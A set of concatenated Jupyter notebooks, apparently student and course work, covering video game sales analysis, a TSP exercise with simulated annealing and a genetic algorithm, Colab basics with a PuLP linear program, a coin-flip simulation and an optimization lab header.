# <a href="https://colab.research.google.com/github/Vinicius-L-R-Matos/-Repositorio-DS/blob/master/_notebook/2021_11_20_EDA_Venda_de_jogos.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="LBnGa6DR5HX6"
# # EDA - Venda de jogos
# Uma contribuição para análise de venda de jogos
#
#
# Abaixo Documentações Libs Gráficos:
#
# - [Matplotlib](https://matplotlib.org/stable/tutorials/index.html#introductory)
# - [Seaborn](https://seaborn.pydata.org/tutorial.html)
#
# Opções de EDA:
#
# [Predict Sales](https://www.kaggle.com/c/competitive-data-science-predict-future-sales/data?select=sales_train.csv)
#
# [PUGB Finish Predict](https://www.kaggle.com/c/pubg-finish-placement-prediction/data)
#
# [Predict Price](https://www.kaggle.com/c/mercari-price-suggestion-challenge/data?select=train.tsv.7z)
#
# [Netflix Dataset](https://www.kaggle.com/shivamb/netflix-shows)
#
#
# [Predict Imdb Rate](https://www.kaggle.com/stefanoleone992/imdb-extensive-dataset?select=IMDb+ratings.csv)
#
# # Desafio Escolhido
#
# [Video Game Sales](https://www.kaggle.com/gregorut/videogamesales)
#
#
# + [markdown] id="NHEQ6klz9Gpy"
# # Possíveis Perguntas
#
# - Qual o jogo mais vendido por região/Genero/Plataforma ? OK
# - Jogo infantil vende mais do que adultos/Cultura do Pais também influência ? - Procurar base para join com classificação
# - Jogos exclusivos vendem mais ? OK
# - Concorrencia entre exclusivos (Principais Fabricantes Video Game)?
# - Produtora que mais vende e mais jogos ?
# Venda por jogo ? Ok
# - Será que a os NA indicam o comportamento do resto do mundo ? OK
# - Há anos com mais vendas de jogos ? OK
# - Genero por Região ? OK
#
#
# + id="ByqaPu9CD1Gr" colab={"base_uri": "https://localhost:8080/"} outputId="1af7dd7d-0ace-4d27-ab13-54d31bd89e81"
# !pip install -U seaborn
# + id="ZhVNYWkqCDCE"
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# + id="fbbtZ37ayHCg"
## ref - https://pythonguides.com/what-is-matplotlib-inline/
# %matplotlib inline
# + id="56gTWZmuqqyi"
#statistics lib
from scipy import stats
# + id="ivkbP69p3CCm"
df = pd.read_csv('vgsales.csv')
# + id="oG0RQi7T3Nlw"
## Inspect
# + colab={"base_uri": "https://localhost:8080/"} id="lIHDI1aJ3QZF" outputId="4fff8174-b593-421b-9092-424c5a7659e6"
df.shape
# + colab={"base_uri": "https://localhost:8080/"} id="LIX4vt8P3apO" outputId="7af80ac7-cdd0-43b6-d67c-6dea1d341b45"
df.info()
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="wOAO5Y4f3egd" outputId="293da600-fcd9-45c9-ae51-5bae7b5a5f69"
df.head()
# + colab={"base_uri": "https://localhost:8080/"} id="-8gzK-It34TT" outputId="3a82dfe3-2786-4d4a-d62b-60f36d1b3237"
df.isna().sum()/df.shape[0]
# + colab={"base_uri": "https://localhost:8080/"} id="h2RhcmPs5-96" outputId="c6243d9a-0a1b-40f8-a146-3497f007f100"
df.columns.str.lower()
# + id="hRamjCWv534I"
columns_renamed = {
'Rank': 'rank',
'Name': 'name',
'Platform': 'platform',
'Year': 'year',
'Genre': 'genre',
'Publisher': 'publisher',
'NA_Sales': 'na_sales',
'EU_Sales': 'eu_sales',
'JP_Sales': 'jp_sales',
'Other_Sales': 'other_sales',
'Global_Sales': 'global_sales'
}
df.rename(columns=columns_renamed, inplace=True)
# + colab={"base_uri": "https://localhost:8080/", "height": 424} id="zMozQnVD4Pyv" outputId="f034d250-b29a-4413-960b-c32d45598728"
df[df.year.isna()]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="lUt1HMS451hW" outputId="23ca9a54-4bbc-42aa-f4bc-ecca9970dcda"
df[df.publisher.isna()]
# + id="pcvl2cSz5wXa"
df.dropna(inplace=True)
# + id="r0NFXhTa3mAl"
df.year =df.year.astype(int)
# + colab={"base_uri": "https://localhost:8080/"} id="3NRhktd53wjX" outputId="844771dd-a7da-41d0-dfc3-0206748c63f5"
df.shape
# + colab={"base_uri": "https://localhost:8080/"} id="DKqB2FQk68c0" outputId="d8ad8950-2ebf-4f40-a6ab-4bb980493faa"
df[df.duplicated()].count()
# + colab={"base_uri": "https://localhost:8080/"} id="GAQ05Bnj7U9H" outputId="480d1bbc-0e79-4ee5-9a22-01f3a83f2bad"
df.info()
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="GDugZ9RO7jDH" outputId="7d654b89-775c-4dc4-e688-bfd12f4d8e8a"
df.head()
# + id="LG5NXGw_7J0j"
## EDA
# + colab={"base_uri": "https://localhost:8080/", "height": 300} id="2x9QLiWu81Z6" outputId="eaaf3f50-677b-4eaa-d517-2cfe8dd50674"
df.describe()
# + id="ILhh3d217NxX"
df_top_games = df[['name', 'na_sales', 'eu_sales', 'jp_sales', 'other_sales']]
# + colab={"base_uri": "https://localhost:8080/"} id="Xeu3edUu9A1O" outputId="de8a31e1-8134-4c5d-c095-f434acf0cfb6"
for col in ['na_sales', 'eu_sales', 'jp_sales', 'other_sales']:
print(col)
print(df_top_games[df_top_games[col]==df_top_games[col].max()])
# + [markdown] id="5iP6-2WUABLm"
# O Jogo mais vendido nas regiões foram Wii Sports, Pokemon, GTA
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="txr9cKI7-Zi5" outputId="2c5f396c-fa02-4f8c-a5a8-fdfa9509bb3f"
for col in ['na_sales', 'eu_sales', 'jp_sales', 'other_sales']:
df_plot = df_top_games.sort_values(by=col, ascending=False).head(5)
df_plot[['name',col]].set_index('name').plot.bar(rot=90)
plt.title(f'Sales in {col}')
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="MnyYRIZUAYJT" outputId="4c940729-7681-4779-d54e-c85110d9ee55"
## Mais vendido por categoria
df.head()
# + id="8BdYzcTTAm2H"
df_genre = df[['name','genre', 'global_sales']]
# + colab={"base_uri": "https://localhost:8080/", "height": 457} id="4UbaolARBxVj" outputId="5c267be3-ea68-45e8-d4cb-3bf51263a952"
df_genre.groupby('genre').agg({'name':'first', 'global_sales':'max'})
# + colab={"base_uri": "https://localhost:8080/"} id="RjdQC7hpBiCv" outputId="163aecab-9865-4f15-b4a9-b5799009afb8"
df_genre.genre.unique()
# + id="1b1l56aYC3PO"
## Jogo por Plataforma
# + id="wIYd9oC3C8q4"
df_plat = df[['name','platform', 'global_sales']]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="y_WoN_IlDLTO" outputId="52c88958-035b-42a2-a8fb-30e39acbbb67"
df_plat.groupby('platform').agg({'name':'first', 'global_sales':'max'}).sort_values(by='global_sales', ascending=False)
# + id="1ajXqUdvDPl3"
### Jogos Exclusivos
# + id="NaGeWsFrEVvW"
df_unique_game_by_plat = df.groupby('name').agg({'platform':'nunique'})
# + id="wOrJj_axE8Ou"
df_unique_game_by_plat = df_unique_game_by_plat[df_unique_game_by_plat.platform==1].reset_index()
# + id="2OhFtUazF7U-"
df_exclusive = df.merge(df_unique_game_by_plat, on='name', how='left')
# + id="ETxStIo1Gvh8"
df_exclusive.rename(columns={'platform_y':'is_exclusive'}, inplace=True)
df_exclusive.is_exclusive = df_exclusive.is_exclusive.fillna(0)
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="eVGBCLQ2Itl4" outputId="91e0d668-98ee-4155-84a5-82feccf2abbe"
df_exclusive.groupby(['year','is_exclusive']).sum()[['global_sales']].reset_index().head()
# + colab={"base_uri": "https://localhost:8080/", "height": 621} id="7htRcsicHJvd" outputId="7b751c41-7e03-4812-8306-54e43baee241"
df_exclusive.groupby(['year','is_exclusive']).sum()[['global_sales']].reset_index().pivot('year','is_exclusive','global_sales').plot(figsize=(15,10))
plt.title('Vendas Exclusivos x Não Exclusivos por Ano')
plt.legend(['Não Exclusivo','Exclusivo'])
plt.show()
# + id="kILZL9JkHtKH" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="b791a412-cc61-484f-cdbb-ced5d87a946d"
df.head()
# + id="YOBPJFFLGE3K"
df_publisher = df.groupby('publisher').agg({'global_sales':'sum', 'name':'nunique'})
# + colab={"base_uri": "https://localhost:8080/", "height": 437} id="PWi7qfsEGvih" outputId="901bd376-ad64-4041-ff46-c477a73b9aa7"
df_publisher.sort_values('global_sales', ascending=False)['global_sales'].head().plot.bar()
plt.title('Top 5 Publisher in Global Sales')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 437} id="PgfUyOMHIHfv" outputId="12fbcc6d-9ceb-41fe-9bf1-fea8c08fc4c3"
df_publisher.sort_values('name', ascending=False)['name'].head().plot.bar()
plt.title('Top 5 Publisher Number of Games')
plt.show()
# + id="-32hNUfzKUTI"
df['sales_without_na'] = df['jp_sales']+df.eu_sales+df.other_sales
# + colab={"base_uri": "https://localhost:8080/", "height": 623} id="EvcKoAwkLM3P" outputId="ee2f7d42-2aa5-43b0-b2a1-4b8c5014b394"
## NA x Others
df.groupby('year').agg({'sales_without_na':'sum', 'na_sales':'sum', 'jp_sales':'sum'}).plot(figsize=(15,10))
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="lLrrLNbrL1jS" outputId="12fa24f2-ed46-4cf9-b8ab-5503293bfc1f"
corr = df[['na_sales','sales_without_na', 'eu_sales','jp_sales','global_sales']].corr()
corr
# + colab={"base_uri": "https://localhost:8080/", "height": 357} id="hQQMwl0qPaYt" outputId="cfcc2feb-de43-4c5e-b01b-61599c076e7a"
sns.heatmap(corr)
plt.title('Correlation')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="CmoCpB_5TLKH" outputId="486de209-1d1b-4734-867c-548eb6f8bc7c"
df.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 238} id="jGHBgNywQAhM" outputId="655a344c-1495-43c7-d010-53893fede5c4"
df_genre_by_region = df.groupby('genre').sum()
df_genre_by_region.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="ysSued8KTSW9" outputId="60041fd3-890c-4375-9289-1ed3a32790c3"
df_genre_by_region[['na_sales','eu_sales', 'jp_sales', 'other_sales']].plot.barh(figsize=(15,10))
plt.show()
# + [markdown] id="GxzlvYbtiejV"
# ### Observação
#
# Trechos comentados não rodaram no collab devido ao custo computacional, rodar localmente para comparar distancia entre titulos de jogos.
# + id="IBvZr2N3Tts6"
df.name = df.name.str.lower()
# + id="HBxXtr1AWoIJ"
df.name = df.name.str.replace(' ', '_')
# + colab={"base_uri": "https://localhost:8080/"} id="OF0XTt0gXtSw" outputId="fb5d3027-b726-44da-8300-49d8cb03fd9e"
# !pip install unidecode
# + id="da8MsqaqXq7P"
import unidecode
# + id="W2bT-AQVXRqg"
df.name = df.name.apply(unidecode.unidecode)
# + colab={"base_uri": "https://localhost:8080/"} id="t3CsBgetZmwf" outputId="fa715f19-0939-4e49-8dae-8a5cb14d02db"
df_1 = df[['name']]
df_2 = df[['name']]
df_1['key'] = 0
df_2['key'] = 0
# + id="L6KeSAy3XoaI"
# Executar Localmente
## df_matrix = df_2.merge(df_1, how='outer', on='key', validate='many_to_many', suffixes=('x_','y_'))
# + id="aW7LFywAYuuY"
# df_matrix.groupby('name').count()
# JACCARD
# def minhash(input_question, compare_question):
# score = 0.0
# shingles = lambda s: set(s[i:i+3] for i in range(len(s)-2))
# jaccard_distance = lambda seta, setb: len(seta & setb)/float(len(seta | setb))
# try:
# score = jaccard_distance(shingles(input_question), shingles(compare_question))
# except ZeroDivisionError:
# print('ZeroDivisionError')
# return score
# df['score'] = df.apply(lambda x: minhash(x.x_name, y_name))
# + colab={"base_uri": "https://localhost:8080/"} id="kRjnMUMCZP_H" outputId="165fda71-19e8-45d3-933c-1e868a2ce8df"
for col in ['na_sales', 'eu_sales', 'jp_sales', 'other_sales']:
print(col)
print(df[df[col]==df[col].min()].head(1))
# + [markdown] id="kc67ORIPcssG"
# #Conclusões
#
# - Existem jogos que venderam mais em plataformas mais difundidas
# - plataformas que venderam aparelhos junto com o jogo atrapalham na contagem
# - Jogos de estratégia não vendem bem fora do Japão
# - O mercado Norte Americano é sempre o que mais compra em todas as categorias. Em especial, os de ação.
|
_notebook/2021_11_20_EDA_Venda_de_jogos.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
sys.path.append('../')
from gonance import *
# %matplotlib inline
crowdlending
crowdlending.barh('Period', ['Profit', 'Estimated Profit'])
crowdlending.plot('Period', ['Profit', 'Estimated Profit'])
crowdlending.scatter('Period', ['Profit', 'Estimated Profit'])
|
examples/gonance.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Ejercicio 4
# Intente resolver dos casos diferentes del problema TSP usando Simulated Annealing y un Algoritmo Evolutivo. El primer problema es de 29 ciudades y el segundo, de 101 ciudades.
# Las ubicaciones de las ciudades se encuentran dentro de una matriz contenida en el archivo con extensión 'cities.npy' mientras que los costos de ir de una ciudad a otra están contenidos en otra matriz almacenada en el archivo con extensión 'distances.npy'. Para ambos casos, se conocen las soluciones óptimas, las cuales se encuentran en los archivos con extensión 'opt.tour.npy'.
#
# Se pide que:
#
# a) Proponga una representación adecuada para las soluciones.
#
# b) Proponga una función de evaluación que le permita cali car que tan buena es una solución.
#
# c) De na como se generarán las soluciones vecinas al usar Simulated Annealing y cuales serán los operadores empleados en el Algoritmo Evolutivo.
#
# d) Implemente y pruebe lo de nido en los puntos anteriores. Evalúe los resultados obtenidos. Detalle todos los parámetros usados durante la ejecución de ambos algoritmos. Justi que.
# +
import numpy as np
import matplotlib.pyplot as plt
#from matplotlib import pylab
#import mpld3
# %matplotlib inline
#mpld3.enable_notebook()
from busqueda_local import hill_climb
from busqueda_local import simulated_annealing
from deap import base, creator, tools, algorithms
# +
# -*- coding: utf-8 -*-
"""
Ejercicio 4: Problema del Viajante.
"""
CIUDADES = np.load('bayg29.cities.npy')
DISTANCIAS = np.load('bayg29.distances.npy')
RECORRIDO_OPTIMO = np.load('bayg29.opt.tour.npy') # Distancia mínima: 1610
#CIUDADES = np.load('eil101.cities.npy')
#DISTANCIAS = np.load('eil101.distances.npy')
#RECORRIDO_OPTIMO = np.load('eil101.opt.tour.npy') # Distancia mínima: 629
def distancia_recorrido(recorrido):
""" Devuelve el largo total del recorrido. """
largo = 0
ciudad_anterior = recorrido[-1]
for ciudad in recorrido:
largo += DISTANCIAS[ciudad_anterior, ciudad]
ciudad_anterior = ciudad
return largo
def mostrar_recorrido(recorrido):
r = recorrido + [recorrido[0]]
plt.figure(1)
plt.clf()
plt.plot(CIUDADES[0], CIUDADES[1], 'o')
plt.plot(CIUDADES[0, r], CIUDADES[1, r], 'r')
plt.show()
# -
CIUDADES = 1047
gananciaPorH = 9
costoPorKm = 2500
# # Simulated Annealing
# ## Nuevos
def nuevos():
a=np.arange(CIUDADES.shape[1])
np.random.shuffle(a)
return a
DISTANCIAS.shape
nuevos()
# ## Evaluacion
def evaluacion(x):
return -distancia_recorrido(x)
# ## Vecinos
# +
def invertirPos(x,pos1,pos2):
aaa=x[pos1]
x[pos1]=x[pos2]
x[pos2]=aaa
return x
def vecinos(x):
v = []
pos=np.random.randint(0,x.size,3)
while pos[0]==pos[1] & pos[1]==pos[2]:
pos=np.random.randint(0,x.size,3)
v.append(invertirPos(x,pos[0],pos[1]))
# v.append(invertirPos(x,pos[0],pos[2]))
# v.append(invertirPos(x,pos[1],pos[2]))
return v
# -
# ## Defino Temperaturas
# Probabilidad prob de elejir soluciones peores con diferencia mayor a dif al inicio
dif = 0.5
prob = 0.03
T_max = -dif / np.log(prob)
# Probabilidad prob de elejir soluciones peores con diferencia mayor a dif al final
dif = 0.05
prob = 0.03
T_min = -dif / np.log(prob)
# Factor de reduccion de acuerdo a las iteraciones deseadas
N = 30
reduccion = np.exp(np.log(T_min / T_max) / N)
# ## Busco
def buscar(i):
mejor = nuevos()
e=0
for j in range(i):
mejor, evaluaciones = simulated_annealing(mejor, evaluacion, vecinos,
T_max=T_max,
T_min=T_min,
reduccion=reduccion)
e+=evaluaciones
print("Cantidad de soluciones evaluadas:", evaluaciones)
print("Valor de func para esa solución:", evaluacion(RECORRIDO_OPTIMO)-evaluacion(mejor))
return
buscar(50)
# # Algoritmo Evolutivo
# ## Defino Fitness Esperado
creator.create("Fitness", base.Fitness, weights=(evaluacion(RECORRIDO_OPTIMO),))
creator.create("Individual", list, fitness=creator.Fitness)
# ## Defino ADN del Individuo
def nuevoCamino():
a=np.arange(CIUDADES.shape[1])
np.random.shuffle(a)
return a
toolbox = base.Toolbox()
toolbox.register("individual", tools.initIterate, creator.Individual, nuevoCamino)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
# ## Defino Evaluacion, Seleccion y Mutacion
def evaluarADN(x):
return [distancia_recorrido(x)]
toolbox.register("evaluate", evaluarADN)
toolbox.register("mate", tools.cxOrdered)
toolbox.register("mutate", tools.mutShuffleIndexes, indpb=0.40)
toolbox.register("select", tools.selTournament, tournsize=5)
def main():
pop = toolbox.population(n=1000)
hof = tools.HallOfFame(1)
stats = tools.Statistics(lambda ind: ind.fitness.values)
stats.register("avg", np.mean)
stats.register("min", np.min)
stats.register("max", np.max)
pop, logbook = algorithms.eaSimple(pop, toolbox, cxpb=0.5, mutpb=0.2, ngen=100, stats=stats, halloffame=hof, verbose=True)
return pop, logbook, hof
if __name__ == "__main__":
pop, log, hof = main()
print("Best individual is: %s\nwith fitness: %s" % (hof[0], hof[0].fitness))
gen, avg, min_, max_ = log.select("gen", "avg", "min", "max")
plt.plot(gen, avg, label="average")
plt.plot(gen, min_, label="minimum")
plt.plot(gen, max_, label="maximum")
plt.xlabel("Generation")
plt.ylabel("Fitness")
plt.legend(loc="lower right")
print("MEJOR RECORRIDO:",evaluacion(RECORRIDO_OPTIMO))
mostrar_recorrido(RECORRIDO_OPTIMO)
|
Argentina - Mondiola Rock - 90 pts/Practica/TP2/ejercicio 4/Ejercicio 4.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/rohini28sept/ESC2/blob/main/Copy_of_Welcome_To_Colaboratory.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="5fCEDCU_qrC0"
# <p><img alt="Colaboratory logo" height="45px" src="/img/colab_favicon.ico" align="left" hspace="10px" vspace="0px"></p>
#
# <h1>What is Colaboratory?</h1>
#
# Colaboratory, or "Colab" for short, allows you to write and execute Python in your browser, with
# - Zero configuration required
# - Free access to GPUs
# - Easy sharing
#
# Whether you're a **student**, a **data scientist** or an **AI researcher**, Colab can make your work easier. Watch [Introduction to Colab](https://www.youtube.com/watch?v=inN8seMm7UI) to learn more, or just get started below!
# + [markdown] id="GJBs_flRovLc"
# ## **Getting started**
#
# The document you are reading is not a static web page, but an interactive environment called a **Colab notebook** that lets you write and execute code.
#
# For example, here is a **code cell** with a short Python script that computes a value, stores it in a variable, and prints the result:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} id="gJr_9dXGpJ05" outputId="9f556d03-ec67-4950-a485-cfdba9ddd14d"
seconds_in_a_day = 24 * 60 * 60
seconds_in_a_day
# + [markdown] id="2fhs6GZ4qFMx"
# To execute the code in the above cell, select it with a click and then either press the play button to the left of the code, or use the keyboard shortcut "Command/Ctrl+Enter". To edit the code, just click the cell and start editing.
#
# Variables that you define in one cell can later be used in other cells:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} id="-gE-Ez1qtyIA" outputId="94cb2224-0edf-457b-90b5-0ac3488d8a97"
seconds_in_a_week = 7 * seconds_in_a_day
seconds_in_a_week
# + [markdown] id="lSrWNr3MuFUS"
# Colab notebooks allow you to combine **executable code** and **rich text** in a single document, along with **images**, **HTML**, **LaTeX** and more. When you create your own Colab notebooks, they are stored in your Google Drive account. You can easily share your Colab notebooks with co-workers or friends, allowing them to comment on your notebooks or even edit them. To learn more, see [Overview of Colab](/notebooks/basic_features_overview.ipynb). To create a new Colab notebook you can use the File menu above, or use the following link: [create a new Colab notebook](http://colab.research.google.com#create=true).
#
# Colab notebooks are Jupyter notebooks that are hosted by Colab. To learn more about the Jupyter project, see [jupyter.org](https://www.jupyter.org).
# + [markdown] id="UdRyKR44dcNI"
# ## Data science
#
# With Colab you can harness the full power of popular Python libraries to analyze and visualize data. The code cell below uses **numpy** to generate some random data, and uses **matplotlib** to visualize it. To edit the code, just click the cell and start editing.
# + colab={"base_uri": "https://localhost:8080/", "height": 281} id="C4HZx7Gndbrh" outputId="46abc637-6abd-41b2-9bba-80a7ae992e06"
import numpy as np
from matplotlib import pyplot as plt
ys = 200 + np.random.randn(100)
x = [x for x in range(len(ys))]
plt.plot(x, ys, '-')
plt.fill_between(x, ys, 195, where=(ys > 195), facecolor='g', alpha=0.6)
plt.title("Sample Visualization")
plt.show()
# + [markdown] id="4_kCnsPUqS6o"
# You can import your own data into Colab notebooks from your Google Drive account, including from spreadsheets, as well as from Github and many other sources. To learn more about importing data, and how Colab can be used for data science, see the links below under [Working with Data](#working-with-data).
# + [markdown] id="OwuxHmxllTwN"
# ## Machine learning
#
# With Colab you can import an image dataset, train an image classifier on it, and evaluate the model, all in just [a few lines of code](https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/quickstart/beginner.ipynb). Colab notebooks execute code on Google's cloud servers, meaning you can leverage the power of Google hardware, including [GPUs and TPUs](#using-accelerated-hardware), regardless of the power of your machine. All you need is a browser.
# + [markdown] id="ufxBm1yRnruN"
# Colab is used extensively in the machine learning community with applications including:
# - Getting started with TensorFlow
# - Developing and training neural networks
# - Experimenting with TPUs
# - Disseminating AI research
# - Creating tutorials
#
# To see sample Colab notebooks that demonstrate machine learning applications, see the [machine learning examples](#machine-learning-examples) below.
# + [markdown] id="-Rh3-Vt9Nev9"
# ## More Resources
#
# ### Working with Notebooks in Colab
# - [Overview of Colaboratory](/notebooks/basic_features_overview.ipynb)
# - [Guide to Markdown](/notebooks/markdown_guide.ipynb)
# - [Importing libraries and installing dependencies](/notebooks/snippets/importing_libraries.ipynb)
# - [Saving and loading notebooks in GitHub](https://colab.research.google.com/github/googlecolab/colabtools/blob/master/notebooks/colab-github-demo.ipynb)
# - [Interactive forms](/notebooks/forms.ipynb)
# - [Interactive widgets](/notebooks/widgets.ipynb)
# - <img src="/img/new.png" height="20px" align="left" hspace="4px" alt="New"></img>
# [TensorFlow 2 in Colab](/notebooks/tensorflow_version.ipynb)
#
# <a name="working-with-data"></a>
# ### Working with Data
# - [Loading data: Drive, Sheets, and Google Cloud Storage](/notebooks/io.ipynb)
# - [Charts: visualizing data](/notebooks/charts.ipynb)
# - [Getting started with BigQuery](/notebooks/bigquery.ipynb)
#
# ### Machine Learning Crash Course
# These are a few of the notebooks from Google's online Machine Learning course. See the [full course website](https://developers.google.com/machine-learning/crash-course/) for more.
# - [Intro to Pandas](/notebooks/mlcc/intro_to_pandas.ipynb)
# - [Tensorflow concepts](/notebooks/mlcc/tensorflow_programming_concepts.ipynb)
#
# <a name="using-accelerated-hardware"></a>
# ### Using Accelerated Hardware
# - [TensorFlow with GPUs](/notebooks/gpu.ipynb)
# - [TensorFlow with TPUs](/notebooks/tpu.ipynb)
# + [markdown] id="P-H6Lw1vyNNd"
# <a name="machine-learning-examples"></a>
#
# ## Machine Learning Examples
#
# To see end-to-end examples of the interactive machine learning analyses that Colaboratory makes possible, check out these tutorials using models from [TensorFlow Hub](https://tfhub.dev).
#
# A few featured examples:
#
# - [Retraining an Image Classifier](https://tensorflow.org/hub/tutorials/tf2_image_retraining): Build a Keras model on top of a pre-trained image classifier to distinguish flowers.
# - [Text Classification](https://tensorflow.org/hub/tutorials/tf2_text_classification): Classify IMDB movie reviews as either *positive* or *negative*.
# - [Style Transfer](https://tensorflow.org/hub/tutorials/tf2_arbitrary_image_stylization): Use deep learning to transfer style between images.
# - [Multilingual Universal Sentence Encoder Q&A](https://tensorflow.org/hub/tutorials/retrieval_with_tf_hub_universal_encoder_qa): Use a machine learning model to answer questions from the SQuAD dataset.
# - [Video Interpolation](https://tensorflow.org/hub/tutorials/tweening_conv3d): Predict what happened in a video between the first and the last frame.
#
# + id="Sq63pu4H5Tmj" colab={"base_uri": "https://localhost:8080/"} outputId="971081a3-09f7-464c-c6ad-3faac026ce7e"
# !pip install pulp
# + id="_2ugc8Kp6z_G" colab={"base_uri": "https://localhost:8080/"} outputId="6a7f7b2e-21b0-4181-9c62-f10ccf3fb9b7"
# import the library pulp as p
import pulp as p
# Create a LP Minimization problem
Lp_prob = p.LpProblem('Problem', p.LpMaximize)
# Create problem Variables
x = p.LpVariable("x", lowBound = 0) # Create a variable x >= 0
y = p.LpVariable("y", lowBound = 0) # Create a variable y >= 0
# Objective Function
Lp_prob += 17.1667 * x + 25.8667 * y
# Constraints:
Lp_prob += 13 * x + 19 * y <= 2400
Lp_prob += 20 * x + 29 * y <= 2100
Lp_prob += x >= 10
Lp_prob += x >= 0
Lp_prob += y >= 0
# Display the problem
print(Lp_prob)
status = Lp_prob.solve() # Solver
print(p.LpStatus[status]) # The solution status
# Printing the final solution
print(p.value(x), p.value(y), p.value(Lp_prob.objective))
# + id="1RIQmRky9OJm" colab={"base_uri": "https://localhost:8080/"} outputId="9d585fbc-d67b-4611-dd66-2a13859b3599"
l=[1,'a',2,'abc']
print(l)
# + id="ZocJZ3p-9iQ0"
l=[-2]
# + id="T2x1z-bM9ndt" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="38f917a4-85aa-4ddc-c8f8-cc4007ee11b8"
l[-2]
# + id="DhjEPyeJ9s2A" colab={"base_uri": "https://localhost:8080/"} outputId="52d11c32-dc87-4df7-9716-b16f2c4d24ec"
l=[1,'a',2,'abc']
print(l[2])
print(l[-2])
print(l[0:])
print(l[0:1])
print(l[2:])
print(l[:3])
print(l[-4:-1])
# + id="UOHZ-1FW-KOu"
def sum(a,b):
z=a+b
return z
# + id="OkBZGbw4_wKF" colab={"base_uri": "https://localhost:8080/"} outputId="df0d1cd4-10a5-4c36-aedd-179b1c5de512"
d= sum("a","b")
print(d)
# + id="LZh_8bkKA-Gn"
import numpy as np
import matplotlib.pyplot as plt
# + id="eRo_aQN1Dbs5" colab={"base_uri": "https://localhost:8080/", "height": 287} outputId="ee6e2348-1559-4ebd-e61d-936fb6b95f02"
x=[1,2,3,4,5]
y=[4,5,6,7,8]
plt.plot(x,y)
plt.xlim(0,10)
plt.ylim(0,10)
# + id="mdObL2axEfc4"
x=[1,2,3,4,5]
y=[]
for i in x:
z=2*i
y.append(z)
# + id="yg2PAtKCFwtQ" colab={"base_uri": "https://localhost:8080/"} outputId="46067a5b-9f11-4b08-c547-e58bef401437"
x=np.linspace(1,5,5)
y=2*x
print(y)
# + id="7Z2EU3SfHAaH" colab={"base_uri": "https://localhost:8080/", "height": 283} outputId="94eaa4a5-a6fb-4790-86c4-e089a4e861ea"
x=np.linspace(1,20,50)
y=18-2*x
y1=(42-2*x)/3
plt.plot(x,y)
plt.plot(x,y1)
# + id="KS58_WuHIlua"
# + id="ahNKlswyIzmF" colab={"base_uri": "https://localhost:8080/", "height": 287} outputId="4d34f71f-30f9-44ac-c2c8-e70686a44c8d"
x=np.linspace(1,20,50)
y=18-2*x
y1=(42-2*x)/3
plt.plot(x,y,label='2x+y=18')
plt.plot(x,y1,label='2x+2y=42')
plt.xlim(0,30)
plt.ylim(0,20)
plt.legend()
# + id="25_dW7HQJPl3" colab={"base_uri": "https://localhost:8080/"} outputId="a196eca8-6b52-484f-8b50-31d91bd32dee"
x=np.array([1,2,3])
x1=np.array(([1],[2],[3]))
print(x)
print(x1)
# + id="y_xpXlx3KLfK" colab={"base_uri": "https://localhost:8080/", "height": 327} outputId="8230fd83-e25a-4eb3-9eb0-e1d5e4a2e1cd"
table=np.array([[1,2,3],[4,5,6],[7,8,9]])
print(table)
print(table[2,1])
print(table[2])
print(table[-2])
print(table[1])
print(table)
# + id="572e5WeZKjSV"
|
Copy_of_Welcome_To_Colaboratory.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import random
# flip coins 100 times and return number of heads
def coin_trial():
heads = 0
for i in range(100):
if random.random() <= 0.5: # Random float: 0.0 <= x < 1.0
heads +=1
return heads
# do the above experiments for n times and return the average of all the results
def simulate(n):
trials = []
for i in range(n):
trials.append(coin_trial())
return(sum(trials)/n)
# -
coin_trial()
simulate(100)
|
flip coins trials.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div>
# <img src="figures/svtLogo.png"/>
# </div>
# <center><h1>Mathematical Optimization for Engineers</h1></center>
# <center><h2>Lab 10 - Deterministic Global Optmization</h2></center>
# In this exercise, we'll look at deterministic global optimization of boxconstrained two-dimensional non-convex problems. We will implement the branch-and-bound method and use the $\alpha$BB method to construct convex relaxations of non-convex objective functions.
# <br>
# <br>
# $$\begin{aligned}
# \min_{\mathbf x\in X} \quad f(\mathbf x) \\
# %\mbox{s.t. } \quad g & \; \leq \; 15 \\
# \end{aligned}$$
# <br>
# <br>
